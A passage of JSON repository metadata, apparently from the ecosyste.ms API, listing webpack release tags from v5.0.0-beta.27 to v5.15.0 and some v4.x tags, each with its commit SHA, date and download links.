api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0/manifests"},{"name":"v5.14.0","sha":"f87cafe91c251863cc3dc84ce81b60445f2a780d","kind":"tag","published_at":"2021-01-13T23:52:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0/manifests"},{"name":"v5.13.0","sha":"a694cdfb82b5fd0a5c52102083a267a36446e03e","kind":"tag","published_at":"2021-01-11T22:30:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0/manifests"},{"name":"v4.46.0","sha":"444e59f8a427f94f0064cae6765e5a3c4b78596d","kind":"tag","published_at":"2021-01-11T13:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0/manifests"},{"name":"v5.12.3","sha":"a064b0ff3315db0d95124aaf5cc9b0a6add82926","kind":"tag","published_at":"2021-01-10T18:23:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3/manifests"},{"name":"v5.12.2","sha":"88610d738ff78fa3fb7f859ee284c632bca42a24","kind":"tag","published_at":"2021-01-09T08:27:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2/manifests"},{"name":"v5.12.1","sha":"62ec1546260d168cffd5dec8fc397c6e1159e4e4","kind":"tag","published_at":"2021-01-08T15:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1/manifests"},{"name":"v5.12.0","sha":"74c9c72b873b27ec552cd6b85a9b578d6698e102","kind":"tag","published_at":"2021-01-08T12:58:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0/manifests"},{"name":"v4.45.0","sha":"03313223fd4a0d4e570b8c79971e61b28cb3aeae","kind":"tag","published_at":"2021-01-08T12:53:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0/manifests"},{"name":"v5.11.1","sha":"98bcf44a43d0109ac2680487fddf3c3262395e1f","kind":"tag","published_at":"2020-12-28T18:06:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1/manifests"},{"name":"v5.11.0","sha":"f04328bad933fd9bacea389df17db96ffbd2336b","kind":"tag","published_at":"2020-12-17T15:59:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0/manifests"},{"name":"v5.10.3","sha":"10ad4e95b850bbe20019275fd1d364666c4b69ea","kind":"tag","published_at":"2020-12-15T20:00:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3/manifests"},{"name":"v5.10.2","sha":"c937292e6fb2e1e0a618d9d633f4184ec64cda75","kind":"tag","published_at":"2020-12-15T08:08:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2/manifests"},{"name":"v5.10.1","sha":"3f3d0138f9c18658be87d89d609fc7c6d286005f","kind":"tag","published_at":"2020-12-11T20:32:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1/manifests"},{"name":"v5.10.0","sha":"06e1cce1221ca717fc8efbaeca5ca71246f85a44","kind":"tag","published_at":"2020-12-04T19:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0/manifests"},{"name":"v5.9.0","sha":"0e7437dc3042874649919d4ffe005db13053c4ff","kind":"tag","published_at":"2020-11-28T21:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0/manifests"},{"name":"v5.8.0","sha":"fb7d09b315bbf3b5388eed0cc5e58309187a3acc","kind":"tag","published_at":"2020-11-26T17:58:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0/manifests"},{"name":"v5.7.0","sha":"4ba6d2ea67e9046cbba83f588989b3cadff7d911","kind":"tag","published_at":"2020-11-26T06:08:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0/manifests"},{"name":"v5.6.0","sha":"1936615458352f38ff517d258b936d690a7b631f","kind":"tag","published_at":"2020-11-19T12:18:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0/manifests"},{"name":"v5.5.1","sha":"a6ebce41059a029163a1774b35d81e0bfaa05b27","kind":"tag","published_at":"2020-11-18T12:39:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1/manifests"},{"name":"v5.5.0","sha":"3471c776059ac2d26593ea39f9c47c1874253dbb","kind":"tag","published_at":"2020-11-17T13:23:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0/manifests"},{"name":"v5.4.0","sha":"84dafd164499b6080243cf9d00537b47b6e075c2","kind":"tag","published_at":"2020-11-03T15:28:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0/manifests"},{"name":"v5.3.2","sha":"3df96f4a7843ef07794c31da8c7469dff133a228","kind":"tag","published_at":"2020-10-29T19:52:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2/manifests"},{"name":"v5.3.1","sha":"dfae6f0ac70e1f4ec6d25a853838d4aa58e10e1f","kind":"tag","published_at":"2020-10-28T21:07:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"ab555844701209492debf23cc3168a0efafb3251","kind":"tag","published_at":"2020-10-27T11:52:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0/manifests"},{"name":"v5.2.1","sha":"d09357b4008da750e0d90066b2cd9567edc27a61","kind":"tag","published_at":"2020-10-27T11:02:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"d42705c05dd62d562b759fb518f86c9854435df4","kind":"tag","published_at":"2020-10-22T16:59:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0/manifests"},{"name":"v5.1.3","sha":"c90dfadbc6c5ac1ab4bda2cc106958b65fb5e6e7","kind":"tag","published_at":"2020-10-16T13:36:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3/manifests"},{"name":"v5.1.2","sha":"83790375529c5b2967d45ed40700399e107d478f","kind":"tag","published_at":"2020-10-15T18:41:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2/manifests"},{"name":"v5.1.1","sha":"f2f998b58362d5edc9945a48f8245a3347ad007c","kind":"tag","published_at":"2020-10-15T13:08:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1/manifests"},{"name":"v5.1.0","sha":"77329b4d0e1aa35e26d8a32b2a8968a824b5de9c","kind":"tag","published_at":"2020-10-13T12:37:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"610f36817af1f1c6929786d68f734ac582af1757","kind":"tag","published_at":"2020-10-10T20:07:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0/manifests"},{"name":"v5.0.0-rc.6","sha":"75ecff262ef0c1953e0d13c0b6a06bdad7ccace5","kind":"tag","published_at":"2020-10-10T19:03:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6/manifests"},{"name":"v5.0.0-rc.5","sha":"57b493f6ff0bd55dddfbfc7ffc2f2680a7f82a6d","kind":"tag","published_at":"2020-10-09T22:38:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5/manifests"},{"name":"v5.0.0-rc.4","sha":"1755fe30224943bca80e14634b4cf3f876e529ef","kind":"tag","published_at":"2020-10-07T08:49:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4/manifests"},{"name":"v5.0.0-rc.3","sha":"ef38f322a963034271b76258beed35239760f526","kind":"tag","published_at":"2020-09-30T08:48:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3/manifests"},{"name":"v5.0.0-rc.2","sha":"d49b49ddebc6c06703e19ff6391915d2b09b0f2b","kind":"tag","published_at":"2020-09-29T18:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2/manifests"},{"name":"v5.0.0-rc.1","sha":"f60db1a079c7df48400637c54c547c161ed189da","kind":"tag","published_at":"2020-09-28T19:18:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1/manifests"},{"name":"v5.0.0-rc.0","sha":"658209c253287de9edee85293d23123d5183a873","kind":"tag","published_at":"2020-09-20T21:11:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0/manifests"},{"name":"v5.0.0-beta.33","sha":"dd3ec4f8072605479410ee7c13cb7a12688939d1","kind":"tag","published_at":"2020-09-20T21:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.33","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33/manifests"},{"name":"v5.0.0-beta.32","sha":"e81882adb2ca1a3cceb3dc28d4f73c09f013eb83","kind":"tag","published_at":"2020-09-18T18:08:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32/manifests"},{"name":"v4.44.2","sha":"2efeb4b5787e868e69233aa9dec469c200fa3b2c","kind":"tag","published_at":"2020-09-17T23:43:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2/manifests"},{"name":"v5.0.0-beta.31","sha":"ea492a530f83b35346986c374f8394814f187eb8","kind":"tag","published_at":"2020-09-17T13:43:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31/manifests"},{"name":"v5.0.0-beta.30","sha":"922c95e9b458e44b999aca2c45d9540079a225b2","kind":"tag","published_at":"2020-09-11T21:55:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30/manifests"},{"name":"v5.0.0-beta.29","sha":"7bc3a031996d17d859d7a5b077ce1c5ab5dc7e29","kind":"tag","published_at":"2020-08-28T19:21:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29/manifests"},{"name":"v5.0.0-beta.28","sha":"e32daa9be5fed184c8befac87216a88872f7df4a","kind":"tag","published_at":"2020-08-20T09:42:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28/manifests"},{"name":"v5.0.0-beta.27","sha":"3cdff531d77ee63251a385e3b6e3ccca2ec37a64","kind":"tag","published_at":"2020-08-19T20:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts